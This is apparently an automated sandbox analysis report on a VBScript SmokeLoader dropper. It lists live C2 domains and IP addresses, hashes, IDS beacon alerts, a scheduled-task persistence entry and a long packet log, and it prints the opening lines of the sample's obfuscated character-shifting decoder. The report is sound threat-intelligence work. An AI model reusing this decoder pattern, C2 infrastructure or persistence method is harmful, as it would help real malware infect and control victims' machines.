                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:i ii.vbs
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.expl.evad.winVBS@7/5@4/2
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 98%
                                                                                                                    • Number of executed functions: 35
                                                                                                                    • Number of non-executed functions: 11
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .vbs
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6012 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    TimeTypeDescription
                                                                                                                    01:52:20API Interceptor31x Sleep call for process: powershell.exe modified
                                                                                                                    01:53:00API Interceptor259217x Sleep call for process: explorer.exe modified
                                                                                                                    07:52:48Task SchedulerRun new task: Firefox Default Browser Agent 08959B8680DAA532 path: C:\Users\user\AppData\Roaming\edrecib
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    109.70.26.37#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • connecticutproperty.ru/
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • connecticutproperty.ru/
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • connecticutproperty.ru/
                                                                                                                    W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.mrpokrovskii.pro/2pji/
                                                                                                                    Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • www.mrpokrovskii.pro/i6b4/
                                                                                                                    Cmbwwkcevcglau.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                    • www.xn--d1acnfnmta.xn--p1ai/pn4e/?PVWk=f3HgyfoZyN&ya3hZ6=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==
                                                                                                                    Uevsumfxudvvsf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                    • www.xn--d1acnfnmta.xn--p1ai/pn4e/
                                                                                                                    SecuriteInfo.com.Variant.Babar.161191.3845.26747.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.art-world.gallery/d82s/?10f=JpK121UpvTpc63rRp+gDJCCdgOsyWOtnd1+5GwkwMtQXrqOXZW8giVHgVA/EVEtRUGaZBcKLcc+iDZn9KexNjAxwg4PMjxbaWQ==&p5TzJe=IDSTB-Oy
                                                                                                                    OUTSTANDING_PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2
                                                                                                                    031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                                                    • www.landlotto.ru/8bfi/?zWlew1c=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&OgJSC=ZGqA1YcB
                                                                                                                    94.156.177.51#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • restructurisationservice.ru/
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • restructurisationservice.ru/
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • restructurisationservice.ru/
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    constractionscity1991.lat#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    connecticutproperty.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    restructurisationservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    spotcarservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    NET1-ASBG#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 94.156.177.51
                                                                                                                    a-r.m-5.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    x-3.2-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    a-r.m-7.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    i-5.8-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    x-8.6-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 93.123.85.8
                                                                                                                    RU-CENTERRU#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    TRC.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 193.232.244.238
                                                                                                                    W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 109.70.26.37
                                                                                                                    Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • 194.85.61.76
                                                                                                                    PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.85.61.76
                                                                                                                    Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.85.61.76
                                                                                                                    payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 194.85.61.76
                                                                                                                    Delivery_Notification_00000207899.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                    • 195.208.1.162
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                                    MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                                    SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                                    SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                                    SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:@...e................................................@..........
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):295424
                                                                                                                    Entropy (8bit):7.368236271015099
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:CwuVnLdSyrzB26P8udhzGV+kVNf+YzExfDZsuiz/JxEVn:CwuVnMyrzE6P8ufzE+kn+Yg+uijw
                                                                                                                    MD5:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                    SHA1:D2DA10A92730DDC0C8D085EFF51756AA769E783A
                                                                                                                    SHA-256:DCB738E5D9F1D0C7D45FC29638324F9774C4BC7DB5D66189686D60D191700B1D
                                                                                                                    SHA-512:34BFBCA9AA8CC7898255429B821CBF0E11A711E0E21BC623178DA336780391D282234587152403171F259D637A9E2192BC25AECA6EAEA9B98742E040F5563C9B
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........j..9..9..9..99..9../9Q..9..(9...9.h.9..9..9...9..&9..9..89..9..=9..9Rich..9........................PE..L...w.d.............................I............@.........................................................................(...(........9..........................................................P...@............................................text............................... ..`.data...........`..................@....rsrc....9.......:...H..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):295424
                                                                                                                    Entropy (8bit):7.368236271015099
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:CwuVnLdSyrzB26P8udhzGV+kVNf+YzExfDZsuiz/JxEVn:CwuVnMyrzE6P8ufzE+kn+Yg+uijw
                                                                                                                    MD5:C02B57E6771A13513DC087F6B45ADAB0
                                                                                                                    SHA1:D2DA10A92730DDC0C8D085EFF51756AA769E783A
                                                                                                                    SHA-256:DCB738E5D9F1D0C7D45FC29638324F9774C4BC7DB5D66189686D60D191700B1D
                                                                                                                    SHA-512:34BFBCA9AA8CC7898255429B821CBF0E11A711E0E21BC623178DA336780391D282234587152403171F259D637A9E2192BC25AECA6EAEA9B98742E040F5563C9B
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........j..9..9..9..99..9../9Q..9..(9...9.h.9..9..9...9..&9..9..89..9..=9..9Rich..9........................PE..L...w.d.............................I............@.........................................................................(...(........9..........................................................P...@............................................text............................... ..`.data...........`..................@....rsrc....9.......:...H..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    File type:ASCII text, with very long lines (6690), with CRLF line terminators
                                                                                                                    Entropy (8bit):3.3866816206461317
                                                                                                                    TrID:
                                                                                                                    • Visual Basic Script (13500/0) 100.00%
                                                                                                                    File name:#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbs
                                                                                                                    File size:7'402 bytes
                                                                                                                    MD5:4c2a534b731225c4afa0409c6c16ae19
                                                                                                                    SHA1:97c5cf1b10a2036a0f897883d00bcf11b3c8a93c
                                                                                                                    SHA256:06fe27eb26975a1cb680fff55f815be29e440a0f2312dbc93171f6aa822fb441
                                                                                                                    SHA512:6953f945bfb2e7e837423de69c775d976770a85b815ee5f2853fdc7975baf8762c719ed8395c16058f9bfe4bf3470c7b5204ef1c1aabb70033f921ec6afdc311
                                                                                                                    SSDEEP:96:dE3mkeWnBYtySsJQj1S8Yfv2A4ZEs8wu9l9f:WH7nBYtydJQpS8Y2Aed8bnt
                                                                                                                    TLSH:AAE1E720083B64B6CB96C855F52F51E818F906297D4F72B173D395E5B5FF90882B0B63
                                                                                                                    File Content Preview:Function SiaEM(ByVal qBEkQDb).. Dim FZXLoZb.. Dim AXBvk.. AXBvk = 390.. Dim MLACEqi.. MLACEqi = QMzYDw(qBEkQDb).. If MLACEqi = 7000 + 1204 Then.. For Each FZXLoZb In qBEkQDb.. Dim QmSW.. QmSW = QmSW & Chr(FZXLoZb - AXBvk)..
                                                                                                                    Icon Hash:68d69b8f86ab9a86
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-12-19T07:52:50.817416+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84971194.156.177.5180TCP
                                                                                                                    2024-12-19T07:52:52.629854+01002025993ET MALWARE Sharik/Smoke CnC Beacon 111192.168.2.84971294.156.177.5180TCP
                                                                                                                    2024-12-19T07:52:52.629854+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84971294.156.177.5180TCP
                                                                                                                    2024-12-19T07:52:52.629854+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.84971294.156.177.5180TCP
                                                                                                                    2024-12-19T07:53:14.751358+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849713109.70.26.3780TCP
                                                                                                                    2024-12-19T07:54:21.614261+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84981994.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:21.614261+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.84981994.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:23.208125+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84982594.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:23.208125+01002851815ETPRO MALWARE Sharik/Smokeloader CnC Beacon 181192.168.2.84982594.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:24.692618+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849826109.70.26.3780TCP
                                                                                                                    2024-12-19T07:54:26.614279+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84983294.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:28.083025+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.84983894.156.177.5180TCP
                                                                                                                    2024-12-19T07:54:29.692497+01002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.849843109.70.26.3780TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 19, 2024 07:52:22.715022087 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:22.834593058 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:22.834780931 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:22.836143970 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:22.955657005 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.202955961 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.202984095 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.202996969 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203110933 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203123093 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203140974 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.203219891 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.203674078 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203685999 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203697920 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203717947 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.203773975 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.203809023 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203821898 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.203917027 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.322731018 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.322896004 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.323092937 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.333028078 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.380013943 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.395030022 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.395064116 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.395246983 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.397526979 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.397641897 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.397691965 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.405903101 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.405982971 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.406085968 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.414480925 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.414527893 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.414640903 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.422712088 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.422799110 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.422899008 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.431092024 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.431211948 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.431282997 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.439455032 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.439547062 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.439678907 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.447827101 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.447917938 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.448028088 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.456221104 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.456381083 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.456509113 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.464775085 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.464960098 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.465151072 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.499552011 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.499680042 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.499852896 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.514884949 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.514924049 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.515034914 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.566554070 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.587271929 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.587366104 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.587429047 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.589596987 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.589668036 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.589684010 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.593271017 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.593444109 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.593461037 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.598084927 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.598164082 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.598200083 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.602705002 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.602771997 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.602803946 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.607433081 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.607549906 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.607578993 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.612268925 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.612365007 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.612370968 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.616977930 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.617078066 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.617085934 CET4970680192.168.2.894.156.177.51
                                                                                                                    Dec 19, 2024 07:52:24.621669054 CET804970694.156.177.51192.168.2.8
                                                                                                                    Dec 19, 2024 07:52:24.621781111 CET4970680192.168.2.894.156.177.51
